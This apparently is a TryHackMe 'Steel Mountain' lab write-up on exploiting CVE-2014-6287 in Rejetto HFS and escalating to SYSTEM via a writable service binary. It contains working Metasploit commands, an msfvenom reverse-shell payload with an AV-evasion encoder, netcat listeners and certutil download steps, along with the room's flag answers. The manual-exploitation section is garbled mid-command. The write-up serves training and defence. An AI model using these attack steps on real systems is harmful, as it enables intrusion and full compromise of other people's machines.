## https://sploitus.com/exploit?id=12B6BD71-7667-5A58-AF52-B59089630526
[](https://github.com/bobxploit)







# Steel Mountain TryHackMe Walkthrough
## Windows Privilege Escalation & HFS RCE
---
## ๐ Table of Contents
- [Executive Summary](#executive-summary)
- [Room Overview](#room-overview)
- [Tools Used](#tools-used)
- [Reconnaissance & Enumeration](#reconnaissance--enumeration)
- [Identifying the Vulnerability](#identifying-the-vulnerability)
- [Initial Access with Metasploit](#initial-access-with-metasploit)
- [User Flag](#user-flag)
- [Privilege Escalation with PowerUp](#privilege-escalation-with-powerup)
- [Exploiting the Service Misconfiguration](#exploiting-the-service-misconfiguration)
- [SYSTEM Shell & Root Flag](#system-shell--root-flag)
- [Manual Exploitation Without Metasploit](#manual-exploitation-without-metasploit)
- [winPEAS Enumeration](#winpeas-enumeration)
- [Lessons Learned](#lessons-learned)
- [References](#references)
---
## Executive Summary
| Field | Detail |
|---|---|
| **Target IP** | `10.114.185.20` |
| **Operating System** | Windows Server 2012 R2 (6.3 Build 9600) |
| **Architecture** | x64 |
| **Key Vulnerability** | CVE-2014-6287 โ Rejetto HFS Remote Code Execution |
| **Exploit Module** | `exploit/windows/http/rejetto_hfs_exec` |
| **Vulnerable Port** | `8080` (HTTP File Server 2.3) |
| **Privilege Escalation** | AdvancedSystemCareService9 โ Writable Service Binary |
| **User Flag** | `b04763b6fcf51fcd7c13abc7db4fd365` |
| **Root Flag** | `9af5f314f57607c00fd09803a587db80` |
---
## Room Overview
> Steel Mountain is a Windows-based TryHackMe room inspired by the fictional *Steel Mountain* data facility from the TV show **Mr. Robot**. The room simulates a realistic corporate environment running a vulnerable HTTP File Server exposed on a non-standard port.
This walkthrough covers **two complete attack paths**:
- **Path A** โ Full exploitation using Metasploit
- **Path B** โ Complete manual exploitation without Metasploit (OSCP-style)
---
## Tools Used
| Tool | Purpose |
|---|---|
|  | Port scanning & service enumeration |
|  | CVE-2014-6287 exploitation |
| `msfvenom` | Malicious payload generation |
| `PowerUp.ps1` | Windows privilege escalation enumeration |
| `winPEAS` | Automated Windows enumeration |
| `netcat` | Reverse shell listener |
| `certutil` | Native Windows file downloader |
| `python3` | Manual exploit execution & HTTP server |
---
## Reconnaissance & Enumeration
Before touching any exploit, we map the full attack surface using Nmap with version detection, default scripts, vulnerability scanning, and OS fingerprinting.
```bash
nmap 10.114.185.20 -sV -sC --script=vuln -O -Pn
```
**Flag breakdown:**
| Flag | Purpose |
|---|---|
| `-sV` | Detect service versions |
| `-sC` | Run default Nmap scripts |
| `--script=vuln` | Run vulnerability detection scripts |
| `-O` | OS fingerprinting |
| `-Pn` | Skip host discovery (treat host as up) |
**Key findings from the scan:**
```
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2
3389/tcp open ssl/ms-wbt-server
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
> [!IMPORTANT]
> **Critical finding:** Port `8080` is running **Rejetto HTTP File Server 2.3** โ a version publicly known to be vulnerable to **CVE-2014-6287** (unauthenticated Remote Code Execution).
---
## Identifying the Vulnerability
**CVE-2014-6287** is a critical Remote Code Execution vulnerability in Rejetto HTTP File Server versions 2.3.x.
| Field | Detail |
|---|---|
| **CVE** | CVE-2014-6287 |
| **CVSS Score** | 7.5 (High) |
| **Affected Versions** | HFS 2.3, 2.3a, 2.3b |
| **Authentication Required** | โ None |
| **Attack Vector** | Network |
**Root cause:** The `findMacroMarker` function fails to properly sanitize null bytes (`%00`) in URL search parameters. By sending a crafted request containing a null byte followed by HFS template macros (e.g., `{.exec|.}`), an attacker can execute arbitrary OS commands on the server โ without any authentication.
> [!WARNING]
> **Impact:** Any attacker with network access to port 8080 can execute arbitrary commands as the HFS service account โ no credentials required.
---
## Initial Access with Metasploit
Metasploit contains a ready exploit module for CVE-2014-6287. Launch Metasploit:
```bash
msfconsole
```
Search for and select the exploit module:
```bash
msf6 > use exploit/windows/http/rejetto_hfs_exec
```
Configure the required parameters:
```bash
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.114.185.20
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
```
**Exploit output:**
```
[*] Started reverse TCP handler on 10.114.66.80:4444
[*] Using URL: http://10.114.66.80:8080/rgHFMeTw
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /rgHFMeTw
[*] Sending stage (177734 bytes) to 10.114.185.20
[!] Tried to delete %TEMP%\zHbprOZvQjZrPH.vbs, unknown result
[*] Meterpreter session 1 opened (10.114.66.80:4444 ->
10.114.185.20:49890) at 2026-05-15 01:26:33 +0100
[*] Server stopped.
```
Verify system information from the Meterpreter prompt:
```bash
meterpreter > sysinfo
```
```
Computer : STEELMOUNTAIN
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
```
> [!NOTE]
> We are running a 32-bit (x86) Meterpreter on a 64-bit system as a low-privileged user. The next step is to capture the user flag and then escalate to SYSTEM.
---
## User Flag
Search the filesystem for the user flag:
```bash
meterpreter > search -f user.txt
```
```
Found 1 result...
c:\Users\bill\Desktop\user.txt (70 bytes)
```
Read the file:
```bash
meterpreter > cat "c:\Users\bill\Desktop\user.txt"
```
```
b04763b6fcf51fcd7c13abc7db4fd365
```
> ๐ **User Flag:** `b04763b6fcf51fcd7c13abc7db4fd365`
---
## Privilege Escalation with PowerUp
With our initial foothold as `bill`, the next objective is escalating to **SYSTEM**. We use **PowerUp.ps1** from the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) framework โ a script that automates detection of common Windows privilege escalation vectors:
- Unquoted service paths
- Writable service binaries
- Weak service ACLs (Access Control Lists)
- AlwaysInstallElevated registry misconfigurations
- Modifiable service registry keys
### Download PowerUp.ps1
```bash
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
```
### Upload to the Target
```bash
meterpreter > upload /root/Desktop/PowerUp.ps1
```
### Load PowerShell & Execute
```bash
meterpreter > load powershell
meterpreter > powershell_shell
```
```powershell
PS > . ./PowerUp.ps1
PS > Invoke-AllChecks
```
### PowerUp Output โ Critical Finding
```
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : C:\Program Files (x86)\IObit\Advanced SystemCare\
CanRestart : True
StartName : LocalSystem
Check : Unquoted Service Paths
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path
```
> [!IMPORTANT]
> **Critical finding:** `AdvancedSystemCareService9` runs as **LocalSystem** (maximum Windows privilege), its binary directory is **writable**, and our user `bill` can **restart the service**. This is a perfect binary hijacking vector.
---
## Exploiting the Service Misconfiguration
### Attack Plan
```
[bill] โ Replace ASCService.exe โ Restart Service โ [SYSTEM Shell]
```
### Step 1 โ Generate a Malicious Payload
On the attacker machine, use `msfvenom` to craft a Windows reverse shell service executable:
```bash
msfvenom -p windows/shell_reverse_tcp \
LHOST=10.114.66.80 \
LPORT=4443 \
-e x86/shikata_ga_nai \
-f exe-service \
-o ASCService.exe
```
| Flag | Description |
|---|---|
| `-p windows/shell_reverse_tcp` | Standard Windows TCP reverse shell |
| `LHOST` / `LPORT` | Attacker IP and listener port |
| `-e x86/shikata_ga_nai` | Polymorphic encoder for basic AV bypass |
| `-f exe-service` | Output as a Windows service executable |
| `-o ASCService.exe` | Filename matching the legitimate binary |
### Step 2 โ Set Up the Listener
```bash
msfconsole -q -x "use exploit/multi/handler; \
set PAYLOAD windows/shell_reverse_tcp; \
set LHOST 10.114.66.80; \
set LPORT 4443; \
exploit"
```
### Step 3 โ Upload the Payload
```bash
meterpreter > upload ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
```
### Step 4 โ Stop, Replace & Restart the Service
Stop the running service:
```powershell
sc stop AdvancedSystemCareService9
```
Copy the malicious payload to overwrite the legitimate binary:
```powershell
Copy-Item -Path "C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASCService.exe" `
-Destination "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" `
-Force
```
Restart the service to trigger code execution as SYSTEM:
```powershell
sc start AdvancedSystemCareService9
```
---
## SYSTEM Shell & Root Flag
The moment the service starts, Windows executes our payload as **LocalSystem**. The listener catches the reverse shell:
```
Connection from 10.114.185.20 received!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
```
Verify privileges:
```cmd
whoami
```
```
nt authority\system
```
Locate and capture the root flag:
```cmd
where /r C:\ root.txt
```
```cmd
type C:\Users\Administrator\Desktop\root.txt
```
```
9af5f314f57607c00fd09803a587db80
```
> ๐ **Root Flag:** `9af5f314f57607c00fd09803a587db80`
---
## Manual Exploitation Without Metasploit
> [!NOTE]
> This section covers the **full attack chain without Metasploit** โ required for OSCP exam conditions and real-world engagements where automated frameworks are restricted.
### Step 1 โ Get the Python Exploit
```bash
searchsploit rejetto
searchsploit -m 39161.py
```
Edit the exploit configuration variables:
```python
ip_addr = "10.112.125.29" # Your TryHackMe VPN IP
local_port = "443" # Listener port
```
### Step 2 โ Set Up the Netcat Listener
```bash
nc -lnvp 443
```
### Step 3 โ Download Static Ncat Binary
The exploit uses `certutil` to pull `ncat.exe` from our HTTP server to the target:
```bash
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
```
### Step 4 โ Host Files via Python HTTP Server
```bash
python3 -m http.server 80
```
### Step 5 โ Execute the Exploit
```bash
python3 CVE-2014-6287.py 10.13.12.138 8080
```
**What happens internally:**
```
Attacker HFS Server (Target)
| |
|-- Sends crafted HTTP request ------>|
| |-- Executes: certutil -urlcache -f
| [!WARNING]
> winPEAS independently confirms the `AdvancedSystemCareService9` directory is **writable by Everyone** and the service runs as **LocalSystem**. This matches the PowerUp finding โ two independent tools confirming the same vector.
---
## Lessons Learned
### ๐ก๏ธ For Defenders
| Finding | Recommendation |
|---|---|
| HFS 2.3 exposed on port 8080 | Patch immediately. CVE-2014-6287 was fixed in 2014. Implement continuous vulnerability management. |
| Service running as LocalSystem | Apply **Least Privilege**. Services rarely need SYSTEM rights. Use dedicated low-privilege accounts. |
| Service directory writable by Everyone | Audit and restrict ACLs on all service binary directories. Use `icacls` or `AccessChk` regularly. |
| HFS reachable from network | Implement **network segmentation**. Internal services must not be reachable from untrusted segments. |
| No FIM in place | Deploy **File Integrity Monitoring** on service binary directories. Binary replacement is immediately detectable. |
### โ๏ธ For Red Teamers
- **Enumerate all ports** โ the critical service was on `8080`, not the obvious port `80`
- **Use both PowerUp and winPEAS** โ they're complementary and confirm each other's findings
- **`certutil` is your friend** โ reliable native Windows downloader, no extra tools needed on target
- **Master manual exploitation** โ Metasploit is a shortcut, not a crutch. The manual path is essential for OSCP
---
## References
| Resource | Link |
|---|---|
| TryHackMe Room | [Steel Mountain](https://tryhackme.com/room/steelmountain) |
| Rapid7 Module | [exploit/windows/http/rejetto_hfs_exec](https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/) |
| Exploit-DB | [CVE-2014-6287 โ EDB-39161](https://www.exploit-db.com/exploits/39161) |
| NVD | [CVE-2014-6287](https://nvd.nist.gov/vuln/detail/CVE-2014-6287) |
| PowerSploit | [PowerUp.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) |
| PEASS-ng | [winPEAS](https://github.com/carlospolop/PEASS-ng) |
| Static Binaries | [ncat.exe](https://github.com/andrew-d/static-binaries) |
---
**Written by [BobXploit](https://github.com/bobxploit)**
*Penetration tester & cybersecurity researcher*
[](https://github.com/bobxploit)
[](https://tryhackme.com)
*Follow for more TryHackMe walkthroughs, CTF write-ups, and offensive security content.*